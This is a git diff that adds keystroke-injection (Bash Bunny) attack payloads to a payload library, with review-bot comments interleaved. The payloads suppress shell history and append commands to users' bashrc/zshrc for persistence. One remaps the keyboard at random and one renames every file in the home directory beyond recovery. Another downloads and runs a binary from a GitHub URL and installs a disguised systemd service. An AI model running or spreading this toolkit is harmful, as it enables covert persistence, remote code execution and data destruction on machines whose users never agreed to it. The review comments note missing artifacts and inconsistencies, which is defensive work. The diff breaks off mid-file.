diff --git a/payloads/extensions/browser_exec.sh b/payloads/extensions/browser_exec.sh
new file mode 100644
index 000000000..6b8bdc145
--- /dev/null
+++ b/payloads/extensions/browser_exec.sh
@@ -0,0 +1,24 @@
+#!/bin/bash
+
+# BROWSER_EXEC v1 by @drapl0n
+# BROWSER_EXEC finds browser installed in target's system and searche for URL in it.
+# Usage: BROWSER_EXEC
+
+function BROWSER_EXEC(){
+ LED ATTACK
+ Q DELAY 1000
+ Q CTRL-ALT t
+ Q DELAY 1000
+ Q STRING unset HISTFILE
+ Q ENTER
+ Q DELAY 200
+ Q STRING echo -e "\"#\!/bin/bash\nfunction browser(){\n\tbrowser=\\\$(ls /bin/ | grep -Ew 'firefox|chromium|brave'| head -1)\n\tif [ \\\"\\\$browser\\\" = firefox ]; then\n\t\texecBrowser=\\\$(echo \\\$browser --private-window)\n\t\texport execBrowser\n\telif [ \\\"\\\$browser\\\" = chromium ]; then\n\t\texecBrowser=\\\$(echo \\\$browser --incognito)\n\t\texport execBrowser\n\telif [ \\\"\\\$browser\\\" = brave ]; then\n\t\texecBrowser=\\\$(echo \\\$browser --incognito)\n\t\texport execBrowser\n\telse\n\t\techo \\\"Browser not found.\\\"\n\tfi\n}\nbrowser\n\\\$execBrowser $1 "\" \> /tmp/sys
+ Q ENTER
+ Q DELAY 200
+ Q STRING chmod +x /tmp/sys
+ Q ENTER
+ Q DELAY 200
+ Q STRING /tmp/./sys \& disown \&\& exit
+ Q ENTER
+}
+export -f BROWSER_EXEC $1
diff --git a/payloads/extensions/capslock_disable.sh b/payloads/extensions/capslock_disable.sh
new file mode 100644
index 000000000..5a3b896e5
--- /dev/null
+++ b/payloads/extensions/capslock_disable.sh
@@ -0,0 +1,16 @@
+#!/bin/sh
+#
+# CAPSLOCK_DISABLE v1 by @drapl0n
+# Disables CapsLock on target's system.
+# Usage: CAPSLOCK_DISABLE ----------------------------(to disable CAPSLOCK on target's system.)
+
+function CAPSLOCK_DISABLE() {
+ Q DELAY 200
+ Q CTRL-ALT t
+ Q DELAY 1000
+ Q STRING setxkbmap -option ctrl:nocaps \&\& exit
+ Q ENTER
+ Q DELAY 200
+}
+
+export -f CAPSLOCK_DISABLE
diff --git a/payloads/extensions/shell_trigger.sh b/payloads/extensions/shell_trigger.sh
new file mode 100644
index 000000000..313c7fd22
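Review bot: `export -f BROWSER_EXEC $1` on the last line of browser_exec.sh hands the sourcing script's `$1` to `export -f` as a second function name, which is either an empty word or whatever the caller happened to pass; the intended line is `export -f BROWSER_EXEC`. The `# Usage: BROWSER_EXEC` header also omits the URL argument that the `Q STRING echo -e` line consumes as `$1`, so I would write `# Usage: BROWSER_EXEC <url>`. The header should additionally name what the extension leaves on the target — `/tmp/sys`, which is created and executed but never removed, and the `unset HISTFILE` in that terminal session — so a lab operator knows what to restore and a responder knows which artifacts to look for. shell_trigger.sh carries the same stray `$1` on its `export -f` line.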
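Review bot: capslock_disable.sh declares `#!/bin/sh` but defines the function with the bash-only `function CAPSLOCK_DISABLE() {` keyword, so the shebang misstates the interpreter; `#!/bin/bash`, as browser_exec.sh and shell_trigger.sh use, or a POSIX `CAPSLOCK_DISABLE() {` definition would be consistent. The description `# Disables CapsLock on target's system.` is also broader than the command: `setxkbmap -option ctrl:nocaps` remaps CapsLock to Ctrl within the running X session, so as far as I can tell it does not persist across logout and has no effect on a Wayland session — worth stating on the Usage line so the README's "disables capslock" claim is scoped. The same `#!/bin/sh`-with-bashisms pattern (`&>`, `echo -e`) appears in swap_jack/payload.sh and mysql_dump/payload.sh later in this commit.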
--- /dev/null
+++ b/payloads/extensions/shell_trigger.sh
@@ -0,0 +1,23 @@
+#!/bin/bash
+
+# SHELL_TRIGGER v1 by @drapl0n
+# SHELL_TRIGGER triggers commands/scripts on shell execution on target's system OR triggers commands/scripts when target executes terminal emulator.
+# Usage: SHELL_TRIGGER
+function SHELL_TRIGGER(){
+ LED ATTACK
+ Q DELAY 1000
+ Q CTRL-ALT t
+ Q DELAY 1000
+ Q STRING unset HISTFILE
+ Q ENTER
+ Q DELAY 200
+ Q STRING echo -e "\"ls -a ~/ | grep 'zshrc' &> /dev/null\\\nif [ \\\$? = 0 ]; then\\\n\\\techo \\\"$1\\\" >> ~/.zshrc\\\nfi\\\n\\\nls -a ~/ | grep 'bashrc' &> /dev/null\\\nif [ \\\$? = 0 ]; then\\\n\\\techo \\\"$1\\\" >> ~/.bashrc\\\nfi"\" \> /tmp/sys
+ Q ENTER
+ Q DELAY 200
+ Q STRING chmod +x /tmp/sys
+ Q ENTER
+ Q DELAY 200
+ Q STRING /tmp/./sys
+ Q ENTER
+}
+export -f SHELL_TRIGGER $1
diff --git a/payloads/library/execution/BROWSER_EXEC_DEMO/README.md b/payloads/library/execution/BROWSER_EXEC_DEMO/README.md
new file mode 100644
index 000000000..53bbdfb30
--- /dev/null
+++ b/payloads/library/execution/BROWSER_EXEC_DEMO/README.md
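Review bot: The `# Usage: SHELL_TRIGGER` header does not say that the function takes an argument, although `$1` is expanded twice inside the `Q STRING echo -e` line and ends up appended to `~/.zshrc` and `~/.bashrc`; I would write `# Usage: SHELL_TRIGGER "<command>"` and state in the header that the extension modifies the user's shell rc files and leaves `/tmp/sys` in place, because those are the persistence artifacts a reviewer, a lab operator and a responder all need named. The SHELL_TRIGGER_DEMO README lists "Executing script in background" as the last workflow step, but `Q STRING /tmp/./sys` here runs it in the foreground (browser_exec.sh is the one that uses `\& disown`), so one of the two should change. The closing `export -f SHELL_TRIGGER $1` has the same stray `$1` noted on browser_exec.sh.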
@@ -0,0 +1,33 @@
+## About:
+# Title: BROWSER_EXEC_DEMO
+# Description: BROWSER_EXEC_DEMO finds browser installed in target's system and searche URL in it.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution.
+# Target: Unix-like operating systems.
+# Attackmodes: HID
+
+## BROWSER_EXEC_DEMO: A payload which finds installed browser in target's system and searche URL in it. This payload can be used as a module to craft a new payload which requires browser execution in it.
+
+### Workflow:
+1. Executing Terminal Emulator.
+2. Prevent storing history.
+3. Storing script in target's system.
+4. Granting execution privilege.
+5. Executing script in background.
+
+### LED Status:
+* `SETUP` : MAGENTA
+* `ATTACK` : YELLOW
+* `FINISH` : GREEN
+
+### Directory Structure of payload components:
+| FileName | Directory |
+| -------------- | --------------------------------|
+| payload.txt | /payloads/switch1/ |
+
+### Changes to be done:
+* Replace URL on line `27` to the URL which you want your target system to visit.
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n
diff --git a/payloads/library/execution/BROWSER_EXEC_DEMO/payload.txt b/payloads/library/execution/BROWSER_EXEC_DEMO/payload.txt
new file mode 100644
index 000000000..dc9b708e5
--- /dev/null
+++ b/payloads/library/execution/BROWSER_EXEC_DEMO/payload.txt
@@ -0,0 +1,29 @@
+# Title: BROWSER_EXEC_DEMO
+# Description: This payload demonstrates functioning of extension BROWSER_EXEC which finds browsers installed in target's system and searches URL in it.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution.
+# Target: Unix-like operating systems.
+# Attackmodes: HID
+
+# [Setting up Bunny]
+LED SETUP
+ATTACKMODE HID
+
+# [Launching Terminal Emulator]
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Executing Main Payload]
+
+# [Note: Replace URL below to the URL which you want your target system to visit.]
+BROWSER_EXEC hak5.org
+
+LED FINISH
diff --git a/payloads/library/execution/CAPSLOCK_DISABLE_DEMO/README.md b/payloads/library/execution/CAPSLOCK_DISABLE_DEMO/README.md
new file mode 100644
index 000000000..7dfb2ddbb
--- /dev/null
+++ b/payloads/library/execution/CAPSLOCK_DISABLE_DEMO/README.md
@@ -0,0 +1,19 @@
+## About
+# Title: CAPSLOCK_DISABLE_DEMO
+# Description: CAPSLOCK_DISABLES_DEMO disables capslock on target's system.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution
+# Target: GNU/Linux.
+# Attackmodes: HID.
+
+## CAPSLOCK_DISABLES_DEMO: CAPSLOCK_DISABLES_DEMO disables capslock on target's system. Can be used as module to craft payloads which requires long time to execute.
+
+### Workflow:
+1. Executing Terminal Emulator.
+2. Prevent storing history.
+3. Executing command which disables capslock.
+4. Terminating terminal instance.
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n
diff --git a/payloads/library/execution/CAPSLOCK_DISABLE_DEMO/payload.txt b/payloads/library/execution/CAPSLOCK_DISABLE_DEMO/payload.txt
new file mode 100644
index 000000000..4b900ce14
--- /dev/null
+++ b/payloads/library/execution/CAPSLOCK_DISABLE_DEMO/payload.txt
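Review bot: The demo types `Q CTRL-ALT t` and `unset HISTFILE` under `# [Launching Terminal Emulator]` and `# [Prevent storing history]`, and then `BROWSER_EXEC hak5.org` repeats both steps inside the extension, so a single run performs the terminal launch and the HISTFILE unset twice while the README's workflow lists each once. Either the demo or the extension should own those steps; since the extension is documented as a reusable module, the note `# [Note: ...]` above the call should at least say that BROWSER_EXEC opens its own terminal. The same duplication is in SHELL_TRIGGER_DEMO/payload.txt and CAPSLOCK_DISABLE_DEMO/payload.txt.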
@@ -0,0 +1,23 @@
+# Title: CAPSLOCK_DISABLE_DEMO
+# Description: Demonstration of CAPSLOCK_DISABLE extension.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution
+# Target: GNU/Linux.
+# Attackmodes: HID.
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Calling Extension]
+CAPSLOCK_DISABLE
diff --git a/payloads/library/execution/SHELL_TRIGGER_DEMO/README.md b/payloads/library/execution/SHELL_TRIGGER_DEMO/README.md
new file mode 100644
index 000000000..05cbd452a
--- /dev/null
+++ b/payloads/library/execution/SHELL_TRIGGER_DEMO/README.md
@@ -0,0 +1,33 @@
+## About:
+# Title: SHELL_TRIGGER_DEMO
+# Description: SHELL_TRIGGER_DEMO payload demonstrates working of SHELL_TRIGGER extension.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution.
+# Target: Unix-like operating systems.
+# Attackmodes: HID
+
+## SHELL_TRIGGER: SHELL_TRIGGER is an extension which triggers commands/scripts on shell execution on target's system OR triggers commands/scripts when target executes terminal emulator.
+
+### Workflow:
+1. Executing Terminal Emulator.
+2. Prevent storing history.
+3. Storing script in target's system.
+4. Granting execution privilege.
+5. Executing script in background.
+
+### LED Status:
+* `SETUP` : MAGENTA
+* `ATTACK` : YELLOW
+* `FINISH` : GREEN
+
+### Directory Structure of payload components:
+| FileName | Directory |
+| -------------- | --------------------------------|
+| payload.txt | /payloads/switch1/ |
+
+### Changes to be made:
+* Replace command on line `7` to the command/script which you want your target system to execute on shell execution.
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n
diff --git a/payloads/library/execution/SHELL_TRIGGER_DEMO/payload.txt b/payloads/library/execution/SHELL_TRIGGER_DEMO/payload.txt
new file mode 100644
index 000000000..daf00cf9d
--- /dev/null
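Review bot: `ATTACKMODE STORAGE HID` exposes the Bunny's mass-storage partition to the host although nothing in CAPSLOCK_DISABLE_DEMO/payload.txt mounts or reads it, and both the header (`# Attackmodes: HID.`) and the README declare HID only; `ATTACKMODE HID`, as BROWSER_EXEC_DEMO/payload.txt uses, would match the declaration and present less to the host. `GET SWITCH_POSITION` is likewise set and never used. The file also ends at `CAPSLOCK_DISABLE` with no `LED FINISH`, unlike every other demo in the commit, so there is no completion signal for the operator.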
+++ b/payloads/library/execution/SHELL_TRIGGER_DEMO/payload.txt
@@ -0,0 +1,29 @@
+# Title: SHELL_TRIGGER_DEMO
+# Description: This payload demonstrates working of SHELL_TRIGGER extension.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution.
+# Target: Unix-like operating systems.
+# Attackmodes: HID
+
+# [Setting up Bunny]
+LED SETUP
+ATTACKMODE HID
+
+# [Launching Terminal Emulator]
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Executing Main Payload]
+
+# [Note: Replace command below to the command/script which you want your target system to execute on shell execution.]
+SHELL_TRIGGER "echo SHELL_TRIGGER extension DEMO"
+
+LED FINISH
diff --git a/payloads/library/execution/keyboard_hangover/README.md b/payloads/library/execution/keyboard_hangover/README.md
new file mode 100644
index 000000000..d83658ecd
--- /dev/null
+++ b/payloads/library/execution/keyboard_hangover/README.md
@@ -0,0 +1,34 @@
+## About:
+* Title: keyboard_hangover
+* Description: keyboard_hangover is a powerful payload which randomly remaps target's keyboard.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Execution.
+* Target: Unix-like operating systems.
+* Attackmodes: HID, Storage.
+
+## keyboard_hangover: keyboard_hangover is a powerful payload which randomly remaps target's keyboard and and auto-triggers it.
+
+### Features:
+1. Randomly remaps keyboard.
+2. Auto-Triggers on shell execution.
+3. Persistent payload.
+4. Fast execution.
+
+### Workflow:
+1. Prevent storing history.
+2. Fetching BashBunny's block device.
+3. Mounting BashBunny.
+4. Executing Payload Script.
+5. Unmounting BashBunny.
+
+### Directory Structure of payload components:
+| FileName | Directory |
+| -------------- | --------------------------------------|
+| payload.txt | /payloads/switch1/ |
+| payload.sh | /payloads/library/keyboard_hangover/ |
+
+* Note: Create directory named `keyboard_hangover` in `/payloads/library/`
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n
diff --git a/payloads/library/execution/keyboard_hangover/payload.sh b/payloads/library/execution/keyboard_hangover/payload.sh
new file mode 100644
index 000000000..09194be99
--- /dev/null
+++ b/payloads/library/execution/keyboard_hangover/payload.sh
@@ -0,0 +1,24 @@
+#!/bin/bash
+
+mapping_file="/var/tmp/sys"
+
+keycodes=($(seq 8 255))
+characters=($(cat /dev/urandom | tr -dc 'a-zA-Z' | fold -w 1 | head -n ${#keycodes[@]}))
+
+mapping_content=""
+for ((i=0; i<${#keycodes[@]}; i++)); do
+ keycode=${keycodes[i]}
+ char=${characters[i]}
+ mapping_content+="keycode $keycode = $char\n"
+done
+
+echo -e $mapping_content > $mapping_file
+
+ls -a ~/ | grep 'zshrc' &> /dev/null
+if [ $? = 0 ]; then
+ echo "xmodmap /var/tmp/sys" >> ~/.zshrc
+fi
+ls -a ~/ | grep 'bashrc' &> /dev/null
+if [ $? = 0 ]; then
+ echo "xmodmap /var/tmp/sys" >> ~/.bashrc
+fi
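Review bot: keyboard_hangover/payload.sh has no header comment, and what it does is more intrusive than the README's "randomly remaps keyboard": it writes an xmodmap table covering every keycode from `seq 8 255` to `/var/tmp/sys`, then appends `xmodmap /var/tmp/sys` to `~/.zshrc` and `~/.bashrc`, so the remap is re-applied on every new shell and no undo table is generated. A header should list those three artifacts and state that recovery means removing the appended rc lines and resetting the X keymap (or logging out of the session) — that is what a lab user needs to know before running it and what a responder will look for afterwards. Style-wise, `echo -e $mapping_content > $mapping_file` and `if [ $? = 0 ]` are the unquoted-expansion / `$?`-test patterns ShellCheck flags, and `cat /dev/urandom | tr` is a useless use of cat.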
diff --git a/payloads/library/execution/keyboard_hangover/payload.txt b/payloads/library/execution/keyboard_hangover/payload.txt
new file mode 100644
index 000000000..966c4730c
--- /dev/null
+++ b/payloads/library/execution/keyboard_hangover/payload.txt
@@ -0,0 +1,53 @@
+# Title: keyboard_hangover
+# Description: keyboard_hangover is a powerful payload which randomly remaps targets keyboard.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution.
+# Target: GNU/Linux.
+# Attackmodes: HID.
+
+LED SETUP
+ATTACKMODE STORAGE
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING disk='$(lsblk -fs | grep BashBunny | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk'
+Q ENTER
+Q DELAY 2000
+Q STRING lmnt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+Q STRING cp -r '$lmnt'/payloads/library/keyboard_hangover/payload.sh /tmp/system
+Q ENTER
+Q STRING chmod +x /tmp/system
+Q ENTER
+Q STRING /tmp/./system
+Q ENTER
+Q DELAY 300
+Q STRING rm /tmp/system
+Q ENTER
+Q DELAY 500
+
+# [Unmounting BashBunny]
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+#Q STRING exit
+Q ENTER
+LED FINISH
diff --git a/payloads/library/execution/malware_exec/README.md b/payloads/library/execution/malware_exec/README.md
new file mode 100644
index 000000000..3da3f104d
--- /dev/null
+++ b/payloads/library/execution/malware_exec/README.md
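Review bot: The header of keyboard_hangover/payload.txt says `# Attackmodes: HID.` (the README says HID, Storage) while the payload sets `ATTACKMODE STORAGE` only, and it then both types keystrokes with `Q STRING` and mounts the Bunny from the host, so the declared mode and the `ATTACKMODE` line disagree and one of them is wrong. The other payloads in this commit that type and mount (mysql_dump, malware_exec, network_surveillance) declare and set the same modes, so this is a consistency fix in the metadata rather than a design question. The same header/`ATTACKMODE` mismatch is in rename_entropy/payload.txt and swap_jack/payload.txt. The trailing `#Q STRING exit` followed by a live `Q ENTER` also sends a bare Enter to the terminal; either both lines should be commented or neither.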
@@ -0,0 +1,45 @@
+## About:
+* Title: malware_exec
+* Description: malware_exec fetches malware hosted on Internet and executes it on targets system.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Exfiltaration
+* Target: Unix-like operating systems .
+* Attackmodes: HID, Storage
+
+## malware_exec: malware_exec fetches malware hosted on Internet and executes it on targets system making it autorun on shell execution and persistent without root privileges.
+
+### Features:
+
+* Executes Malware.
+* Trigger malware on shell execution/autorun malware on shell execution.
+* Persistent Malware.
+* No root privileges required.
+
+### Workflow:
+1. Prevent storing history.
+2. Fetching BashBunny's block device.
+3. Mounting BashBunny.
+4. Executing Malware.
+5. Making malware autorun and persistent (optional).
+5. Unmounting BashBunny.
+
+### Usage:
+* Change Testing URL on line `36` to your custom URL.
+* Uncomment line `46` to `56` to make malware persistent and autorun it on shell execution.
+
+### LED Status:
+* `SETUP` : MAGENTA
+* `ATTACK` : YELLOW
+* `FINISH` : GREEN
+
+### Directory Structure of payload components:
+| FileName | Directory |
+| -------------- | --------------------------------|
+| payload.txt | /payloads/switch1/ |
+| payload.sh | /payloads/library/malware_exec/ |
+
+* Note: Create directory named `malware_exec` in `/payloads/library/`
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n
diff --git a/payloads/library/execution/malware_exec/payload.sh b/payloads/library/execution/malware_exec/payload.sh
new file mode 100644
index 000000000..80c38c262
--- /dev/null
+++ b/payloads/library/execution/malware_exec/payload.sh
@@ -0,0 +1,8 @@
+#!/bin/sh
+mkdir /var/tmp/.system
+mkdir -p ~/.config/systemd/user
+echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/sys -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=defaulr.target" > ~/.config/systemd/user/systemBUS.service
+echo -e "ls -a ~/ | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a ~/ | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > /tmp/tmmmp
+systemctl --user enable --now systemBUS.service
+systemctl --user start --now systemBUS.service
+chmod +x /tmp/tmmmp && cd ~/ && /tmp/tmmmp && rm /tmp/tmmmp
diff --git a/payloads/library/execution/malware_exec/payload.txt b/payloads/library/execution/malware_exec/payload.txt
new file mode 100644
index 000000000..0ebca3f67
--- /dev/null
+++ b/payloads/library/execution/malware_exec/payload.txt
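Review bot: malware_exec/payload.sh has no header comment, and it is the file in this commit that most needs one: it installs a user-level systemd unit at `~/.config/systemd/user/systemBUS.service` whose `ExecStart` runs `/var/tmp/.system/sys`, enables it with `systemctl --user enable --now`, and appends that same `systemctl` line to `~/.zshrc` and `~/.bashrc`. A header listing those artifacts (the unit file, the rc-file lines, the `/var/tmp/.system/` directory) is what a lab operator needs to restore the host and what a detection engineer would key on, and the unit's `Description= System BUS handler` deserves an explicit comment that it is a deliberately misleading label rather than a description. The README's `# Category: Exfiltaration` also disagrees with payload.txt's `# Category: Execution` for the same payload.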
@@ -0,0 +1,68 @@
+# Title: malware_exec
+# Description: malware_exec fetches malware hosted on Internet and executes it on targets system. malware_exec can make malware persistent and can autorun.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution
+# Target: GNU/Linux.
+# Attackmodes: HID, Storage.
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING disk='$(lsblk -fs | grep BashBunny | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk'
+Q ENTER
+Q DELAY 2000
+Q STRING lmnt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [Fetching malware]
+Q STRING url=https://raw.githubusercontent.com/drapl0n/temp/main/malware_exec
+Q ENTER
+Q DELAY 200
+#Q STRING mkdir -p /var/tmp/.system/ \&\& wget '$url' -O /var/tmp/.system/sys
+Q ENTER
+# [change delay time below according to file size]
+Q DELAY 5000
+Q STRING chmod +x /var/tmp/.system/sys
+Q ENTER
+
+# [transfering payload script]
+# Q STRING cp -r '$lmnt'/payloads/library/malware_exec/payload.sh /tmp/
+# Q ENTER
+# Q STRING chmod +x /tmp/payload.sh
+# Q ENTER
+# Q STRING /tmp/./payload.sh
+# Q ENTER
+# Q DELAY 1500
+# Q STRING rm /tmp/payload.sh
+# Q ENTER
+# Q DELAY 500
+
+# [Unmounting BashBunny]
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+
+# [Executing Malware]
+Q DELAY 100
+Q STRING /var/tmp/.system/./sys /&/& exit
+Q ENTER
+
+LED FINISH
diff --git a/payloads/library/execution/rename_entropy/README.md b/payloads/library/execution/rename_entropy/README.md
new file mode 100644
index 000000000..0522c9f5e
--- /dev/null
+++ b/payloads/library/execution/rename_entropy/README.md
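Review bot: `Q STRING url=https://raw.githubusercontent.com/drapl0n/temp/main/malware_exec` hard-codes a fetch-and-execute from a personal GitHub repository into a committed payload, with no pinning or checksum: anyone who runs this as checked in executes whatever that repository serves at that moment, which is a supply-chain exposure for users of this library rather than a demo value. The README's "Change Testing URL on line `36`" does not convey that, so the comment above the line should say the URL is a placeholder that must be replaced and that the downloaded file is run unverified — a commented-out example URL would make it harder to overlook. The header's `# Category: Execution` also conflicts with the README's `Exfiltaration` for the same payload.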
@@ -0,0 +1,36 @@
+## About:
+* Title: rename_entropy
+* Description: rename_entropy is a powerful payload which renames target files with extensions.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Execution.
+* Target: Unix-like operating systems.
+* Attackmodes: HID, Storage.
+
+## rename_entropy: rename_entropy is a powerful payload which renames target files with extensions.
+
+### Workflow:
+1. Prevent storing history.
+2. Fetching BashBunny's block device.
+3. Mounting BashBunny.
+4. Executing Payload Script.
+5. Unmounting BashBunny.
+
+### LED Status:
+* `SETUP` : MAGENTA
+* `ATTACK` : YELLOW
+* `FINISH` : GREEN
+
+### Directory Structure of payload components:
+| FileName | Directory |
+| -------------- | ----------------------------------|
+| payload.txt | /payloads/switch1/ |
+| payload.sh | /payloads/library/rename_entropy/ |
+
+* Note: Create directory named `rename_entropy` in `/payloads/library/`
+
+### Changes which can be made:
+* You can change location of renaming files and directories at line `2` in `payload.sh` (Default location ~/home/).
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n
diff --git a/payloads/library/execution/rename_entropy/payload.sh b/payloads/library/execution/rename_entropy/payload.sh
new file mode 100644
index 000000000..acfad4957
--- /dev/null
+++ b/payloads/library/execution/rename_entropy/payload.sh
@@ -0,0 +1,8 @@
+#!/bin/bash
+dir="/home/$(whoami)/"
+cd "$dir" || exit
+for file in *; do
+ rand_str=$(cat /dev/urandom | tr -dc 'a-zA-Z' | fold -w 10 | head -n 1)
+ rand_ext=$(cat /dev/urandom | tr -dc 'a-zA-Z' | fold -w 3 | head -n 1)
+ mv "$file" "${rand_str}.${rand_ext}"
+done
diff --git a/payloads/library/execution/rename_entropy/payload.txt b/payloads/library/execution/rename_entropy/payload.txt
new file mode 100644
index 000000000..6886e4a18
--- /dev/null
+++ b/payloads/library/execution/rename_entropy/payload.txt
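Review bot: rename_entropy/payload.sh renames every non-hidden entry in the user's home directory (`cd "$dir"` then `for file in *`), directories included, to a random name and keeps no record of the original names, so the change is irreversible; neither the script nor the README says so, and the README's "Default location ~/home/" does not match `dir="/home/$(whoami)/"` on line 2. A header comment should state the scope, that no mapping is written, and that it is only safe against a disposable lab account — a reader of the README's "renames target files with extensions" would not infer that. Style: `cat /dev/urandom | tr` is a useless use of cat, and with no `nullglob` an empty directory passes the literal `*` to `mv`.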
@@ -0,0 +1,53 @@
+# Title: swap_jack
+# Description: swap_jack, simple yet powerful payload which can be used to replace one command with another on target’s system.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution.
+# Target: GNU/Linux.
+# Attackmodes: HID, STORAGE.
+
+LED SETUP
+ATTACKMODE STORAGE
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING disk='$(lsblk -fs | grep BashBunny | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk'
+Q ENTER
+Q DELAY 2000
+Q STRING lmnt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+Q STRING cp -r '$lmnt'/payloads/library/rename_entropy/payload.sh /tmp/system
+Q ENTER
+Q STRING chmod +x /tmp/system
+Q ENTER
+Q STRING /tmp/./system
+Q ENTER
+Q DELAY 300
+Q STRING rm /tmp/system
+Q ENTER
+Q DELAY 500
+
+# [Unmounting BashBunny]
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER
+LED FINISH
diff --git a/payloads/library/execution/swap_jack/README.md b/payloads/library/execution/swap_jack/README.md
new file mode 100644
index 000000000..24d0ca9fb
--- /dev/null
+++ b/payloads/library/execution/swap_jack/README.md
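Review bot: The metadata block of rename_entropy/payload.txt is swap_jack's — `# Title: swap_jack` and the swap_jack description — and only the `cp -r '$lmnt'/payloads/library/rename_entropy/payload.sh` line identifies which payload this is; the header should read `# Title: rename_entropy` with the description from rename_entropy/README.md. Separately, the README table places payload.sh under `/payloads/library/rename_entropy/` and the `cp` line reads from that path, while this commit adds the file under `payloads/library/execution/rename_entropy/`, so the committed location and the path the payload uses differ unless the user follows the README's "create directory" note; the same split applies to keyboard_hangover, malware_exec, swap_jack and mysql_dump and deserves one sentence in each README explaining why.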
@@ -0,0 +1,45 @@
+## About:
+* Title: swap_jack
+* Description: swap_jack, simple yet powerful payload which can be used to replace one command with another on target's system.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Execution.
+* Target: Unix-like operating systems.
+* Attackmodes: HID, Storage.
+
+## swap_jack: Simple yet Powerful payload which can be used to replace one command with another on target’s system. swap_jack gives your target ability to trigger backdoors for you.
+
+### Features:
+1. Swap commands/Execute scripts covertly.
+2. Persistent.
+3. Can swap multiple commands.
+4. Makes your target run commands/script for you.
+
+### Workflow:
+1. Prevent storing history.
+2. Fetching BashBunny's block device.
+3. Mounting BashBunny.
+4. Executing Payload Script.
+5. Unmounting BashBunny.
+
+### LED Status:
+* `SETUP` : MAGENTA
+* `ATTACK` : YELLOW
+* `FINISH` : GREEN
+
+### Usage:
+* To swap custom commands make following changes at line `2` in `payload.sh`:
+* Default swaped commands: `swap_array='alias ls=\"du\" \\n alias cd=\"dh\" \\n alias cat=\"lsblk\"'`.
+* Example: Swapping `pwd` command with `find`:
+* Add entry seperated by `\\n` to the line `2`: `swap_array='alias ls=\"du\" \\n alias cd=\"dh\" \\n alias cat=\"lsblk\"' \\n alias pwd=\"find\"`
+
+### Directory Structure of payload components:
+| FileName | Directory |
+| -------------- | ----------------------------- |
+| payload.txt | /payloads/switch1/ |
+| payload.sh | /payloads/library/swap_jack/ |
+
+* Note: Create directory named `swap_jack` in `/payloads/library/`
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n
diff --git a/payloads/library/execution/swap_jack/payload.sh b/payloads/library/execution/swap_jack/payload.sh
new file mode 100644
index 000000000..ba6d0b85c
--- /dev/null
+++ b/payloads/library/execution/swap_jack/payload.sh
@@ -0,0 +1,6 @@
+#!/bin/sh
